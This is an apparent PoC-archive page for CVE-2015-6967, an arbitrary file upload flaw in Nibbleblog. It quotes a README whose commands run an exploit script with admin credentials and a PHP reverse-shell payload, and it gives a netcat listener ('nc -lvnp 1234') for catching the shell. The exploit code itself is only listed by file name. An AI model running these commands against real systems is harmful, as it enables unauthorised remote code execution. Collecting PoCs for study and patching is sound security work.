Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-6967 PoC — Nibbleblog 代码注入漏洞

Source
https://github.com/cuerv0x/CVE-2015-6967
Associated Vulnerability
Title:Nibbleblog 代码注入漏洞 (CVE-2015-6967)
Description:NibbleBlog是一套博客引擎。 Nibbleblog 4.0.5之前版本的My Image插件中存在任意文件上传漏洞。远程攻击者可通过上传可执行文件,并发送直接的请求访问该文件利用该漏洞执行任意代码。
Readme
# CVE-2015-6967
python exploit.py --url http://xx.xx.xx.xx --username admin --password nibbles --payload phprevshell.php

Cambiar $ip en linea 7 de phprevshell.php


nc -lvnp 1234
File Snapshot

 [4.0K]  /data/pocs/3c9e48cff291d3103694e9797f38841b496599cd
├── [   0]  exploit.log
├── [ 14K]  exploit.py
├── [2.7K]  phprevshell.php
└── [ 180]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.